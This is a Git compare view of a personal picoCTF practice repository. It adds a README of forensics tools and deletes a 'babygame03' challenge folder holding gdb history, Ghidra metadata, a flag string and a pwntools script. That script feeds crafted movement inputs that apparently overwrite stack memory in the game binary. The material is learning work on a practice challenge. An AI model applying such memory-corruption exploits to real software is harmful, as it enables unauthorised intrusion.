Compare commits
6 Commits
babygame03
...
2d01bffb2a
| Author | SHA1 | Date | |
|---|---|---|---|
| 2d01bffb2a | |||
|
8f04827901 | ||
|
|
a02132a1e0 | ||
|
|
6ac770c738 | ||
|
|
1ecd3903b4 | ||
|
|
ad954f2364 |
7
README.md
Normal file
7
README.md
Normal file
@@ -0,0 +1,7 @@
|
||||
# picoCTF
|
||||
|
||||
## programs used
|
||||
- TrID
|
||||
- exiftool
|
||||
- aircrack-ng
|
||||
- kaitai
|
||||
@@ -1,256 +0,0 @@
|
||||
c
|
||||
c
|
||||
x/40x 0xffffbd00
|
||||
c
|
||||
c
|
||||
run
|
||||
c
|
||||
run
|
||||
c
|
||||
x/40x 0xffffbd00
|
||||
c
|
||||
run
|
||||
exit
|
||||
b *move_player
|
||||
run < out
|
||||
c
|
||||
c
|
||||
x/40x 0xffffbd00
|
||||
c
|
||||
x/40x 0xffffbd00
|
||||
disassemble main
|
||||
b *main+39
|
||||
run < out
|
||||
stack
|
||||
stack 20
|
||||
clear *main+3
|
||||
clear *main+39
|
||||
b *main+93
|
||||
run < out
|
||||
stack 20
|
||||
stack 20
|
||||
stack 40
|
||||
stack 60
|
||||
stack 80
|
||||
stack 100
|
||||
stack 200
|
||||
stack 100
|
||||
stack 110
|
||||
stack 400
|
||||
stack 1000
|
||||
stack 600
|
||||
stack 700
|
||||
stack 680
|
||||
stack 690
|
||||
stack 685
|
||||
stack 686
|
||||
stack 687
|
||||
stack 688
|
||||
stack 689
|
||||
stack 688
|
||||
x/x 0xffffdb0c
|
||||
x/x 0xffffbd0c
|
||||
continue
|
||||
c
|
||||
run < out
|
||||
x/x 0xffffbd0c
|
||||
c
|
||||
continue
|
||||
run < out
|
||||
c
|
||||
x/x 0xffffbd0c
|
||||
c
|
||||
x/x 0xffffbd0c
|
||||
disassemble main
|
||||
b *main+372
|
||||
x/x 0xffffbd0c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
b
|
||||
clear 5
|
||||
exit
|
||||
disassemble main
|
||||
x/x 0xffffbd0c
|
||||
b *move_player
|
||||
run < out
|
||||
x/x 0xffffbd0c
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffcd00
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffbf00
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffc000
|
||||
x/40x 0xffffc400
|
||||
x/40x 0xffffc600
|
||||
x/40x 0xffffc800
|
||||
x/40x 0xffffc700
|
||||
x/40x 0xffffc780
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffc780
|
||||
x/x 0xffffc7ac
|
||||
x/x 0xffffbd0c
|
||||
x/40x 0xffffbd00
|
||||
exit
|
||||
b *move_player
|
||||
x/x 0xffffbd0c
|
||||
x/x 0xffffc7ac
|
||||
run < out2
|
||||
x/x 0xffffc7ac
|
||||
x/x 0xffffbd0c
|
||||
c
|
||||
c
|
||||
x/x 0xffffc7ac
|
||||
c
|
||||
x/x 0xffffc7ac
|
||||
run < out2
|
||||
x/x 0xffffc7ac
|
||||
x/x 0xffffbd0c
|
||||
c
|
||||
x/x 0xffffc7ac
|
||||
c
|
||||
x/x 0xffffc7ac
|
||||
x/40x 0xffffbd00
|
||||
exit
|
||||
disassemble main
|
||||
disassemble move_player
|
||||
b *move_player+8
|
||||
run
|
||||
stack 20
|
||||
stack 30
|
||||
x/40x 0xffa890
|
||||
x/40x 0xffffa890
|
||||
exit
|
||||
b *move_player+8
|
||||
run
|
||||
stack 20
|
||||
c
|
||||
c
|
||||
stack 20
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
x/40x 0xffffa890
|
||||
c
|
||||
exit
|
||||
exit
|
||||
disassemble main
|
||||
q
|
||||
disassemble main
|
||||
disassemble move_
|
||||
disassemble move_player
|
||||
b *move_player+357
|
||||
run < out
|
||||
c
|
||||
run < out
|
||||
c
|
||||
exit
|
||||
b *move_player+357
|
||||
run < out3
|
||||
c
|
||||
stack 20
|
||||
x/40x 0xffffbce0
|
||||
x/40x 0xffffbcf0
|
||||
x/40x 0xffffbe00
|
||||
x/40x 0xffffbd0
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffbd2f
|
||||
x/40x 0xffffbd00
|
||||
x/40x 0xffffbc00
|
||||
x/40x 0xffffbcd0
|
||||
stack 30
|
||||
stack 800
|
||||
stack 700
|
||||
stack 720
|
||||
stack 700
|
||||
stack 710
|
||||
stack 720
|
||||
disassemble main
|
||||
stack 40
|
||||
stack -1 40
|
||||
stack 40 -1
|
||||
stack 40 -10
|
||||
stack 40
|
||||
stack 40
|
||||
x/40x 0xffffbcd0
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
run < out3
|
||||
c
|
||||
run
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
c
|
||||
exit
|
||||
disassemble move_player
|
||||
b *move_player+357
|
||||
run < out2
|
||||
c
|
||||
stack 40
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
run < out2
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
run < out2
|
||||
c
|
||||
x/40x 0xffffbce0
|
||||
c
|
||||
c
|
||||
exit
|
||||
disassemble main
|
||||
b *main+378
|
||||
run < args
|
||||
run < args
|
||||
run < args
|
||||
tic
|
||||
exit
|
||||
@@ -1,2 +0,0 @@
|
||||
aaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpwsaaaaaaaawwwwswws
|
||||
|
||||
@@ -1,9 +0,0 @@
|
||||
#Ghidra Lock File
|
||||
#Mon Nov 18 09:14:36 CET 2024
|
||||
<META>\ Supports\ File\ Channel\ Locking=Channel Lock
|
||||
Hostname=theon-1
|
||||
OS\ Architecture=amd64
|
||||
OS\ Name=Linux
|
||||
OS\ Version=6.11.6-arch1-1
|
||||
Timestamp=11/18/24, 9\:14\u202FAM
|
||||
Username=maxime
|
||||
@@ -1,11 +0,0 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<FILE_INFO>
|
||||
<BASIC_INFO>
|
||||
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
|
||||
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
|
||||
<STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b32f38007603038077" />
|
||||
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
|
||||
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
|
||||
<STATE NAME="NAME" TYPE="string" VALUE="game" />
|
||||
</BASIC_INFO>
|
||||
</FILE_INFO>
|
||||
Binary file not shown.
Binary file not shown.
@@ -1,7 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
00000001:game:ac10290b32f38007603038077
|
||||
/New Traces
|
||||
00000002:Emulate game:ac10290839926930849280384
|
||||
NEXT-ID:3
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1,5 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
00000001:game:ac10290b32f38007603038077
|
||||
NEXT-ID:3
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1,2 +0,0 @@
|
||||
IDEL:/New Traces/Emulate game
|
||||
FDEL:/New Traces
|
||||
@@ -1,6 +0,0 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<FILE_INFO>
|
||||
<BASIC_INFO>
|
||||
<STATE NAME="OWNER" TYPE="string" VALUE="maxime" />
|
||||
</BASIC_INFO>
|
||||
</FILE_INFO>
|
||||
@@ -1,15 +0,0 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<PROJECT>
|
||||
<PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
|
||||
<SAVE_STATE>
|
||||
<ARRAY NAME="EXPANDED_PATHS" TYPE="string">
|
||||
<A VALUE="babygame03:" />
|
||||
</ARRAY>
|
||||
<STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
|
||||
</SAVE_STATE>
|
||||
</PROJECT_DATA_XML_NAME>
|
||||
<TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
|
||||
<WORKSPACE NAME="Workspace" ACTIVE="true" />
|
||||
</TOOL_MANAGER>
|
||||
</PROJECT>
|
||||
|
||||
@@ -1,11 +0,0 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<FILE_INFO>
|
||||
<BASIC_INFO>
|
||||
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
|
||||
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
|
||||
<STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b31146457713312322" />
|
||||
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
|
||||
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
|
||||
<STATE NAME="NAME" TYPE="string" VALUE="udf_ac10290b32f38007603038077" />
|
||||
</BASIC_INFO>
|
||||
</FILE_INFO>
|
||||
Binary file not shown.
Binary file not shown.
@@ -1,4 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
NEXT-ID:1
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1,5 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
00000001:udf_ac10290b32f38007603038077:ac10290b31146457713312322
|
||||
NEXT-ID:2
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1,2 +0,0 @@
|
||||
IADD:00000001:/udf_ac10290b32f38007603038077
|
||||
IDSET:/udf_ac10290b32f38007603038077:ac10290b31146457713312322
|
||||
@@ -1,4 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
NEXT-ID:0
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1,4 +0,0 @@
|
||||
VERSION=1
|
||||
/
|
||||
NEXT-ID:0
|
||||
MD5:d41d8cd98f00b204e9800998ecf8427e
|
||||
@@ -1 +0,0 @@
|
||||
flag{test}
|
||||
BIN
babygame03/game
BIN
babygame03/game
Binary file not shown.
@@ -1,10 +0,0 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
a = 'aaaa'+'a'*4+'wwwws'
|
||||
b = 'a'*47+'lp'+'ws'
|
||||
|
||||
s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
|
||||
|
||||
print(s)
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
aaaaaaaawwwws
|
||||
@@ -1 +0,0 @@
|
||||
aaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpws
|
||||
@@ -1 +0,0 @@
|
||||
aaaaaaaawwwws
|
||||
@@ -1,16 +0,0 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
s = b'aaaa'+b'a'*4+b'wwwws'
|
||||
|
||||
conn = process(["./game"])
|
||||
for i in range(3):
|
||||
conn.sendline(s)
|
||||
conn.sendline(b'p')
|
||||
conn.sendline(s)
|
||||
conn.sendline(b'a'*47+b'l\x70'+b'ws')
|
||||
conn.sendline(s)
|
||||
conn.sendline(b'wws')
|
||||
conn.sendline(b'a'*47+b'l\xfe'+b'w')
|
||||
conn.interactive()
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f35653637656135657d
|
||||
Binary file not shown.
Binary file not shown.
@@ -1 +0,0 @@
|
||||
1.6.0
|
||||
@@ -1 +0,0 @@
|
||||
1.3.0
|
||||
@@ -1 +0,0 @@
|
||||
1.6.1
|
||||
@@ -1 +0,0 @@
|
||||
1.6.1
|
||||
@@ -1 +0,0 @@
|
||||
2.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.9.0
|
||||
@@ -1 +0,0 @@
|
||||
1.9.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.1
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.2.0
|
||||
@@ -1 +0,0 @@
|
||||
1.2.0
|
||||
@@ -1 +0,0 @@
|
||||
1.3.6
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
2.5.1
|
||||
@@ -1 +0,0 @@
|
||||
2.0.0
|
||||
@@ -1 +0,0 @@
|
||||
2.4.1
|
||||
@@ -1 +0,0 @@
|
||||
2.5.1
|
||||
@@ -1 +0,0 @@
|
||||
2.5.1
|
||||
@@ -1 +0,0 @@
|
||||
2.5.1
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.2.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.1
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.2.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.0
|
||||
@@ -1 +0,0 @@
|
||||
1.1.1
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.0.0
|
||||
@@ -1 +0,0 @@
|
||||
1.5.0
|
||||
@@ -1,2 +0,0 @@
|
||||
appMetadataVersion=1.1
|
||||
androidGradlePluginVersion=8.0.2
|
||||
@@ -1 +0,0 @@
|
||||
1.6.1
|
||||
@@ -1 +0,0 @@
|
||||
1.6.1
|
||||
@@ -1 +0,0 @@
|
||||
kotlinx.coroutines.android.AndroidExceptionPreHandler
|
||||
@@ -1 +0,0 @@
|
||||
kotlinx.coroutines.android.AndroidDispatcherFactory
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user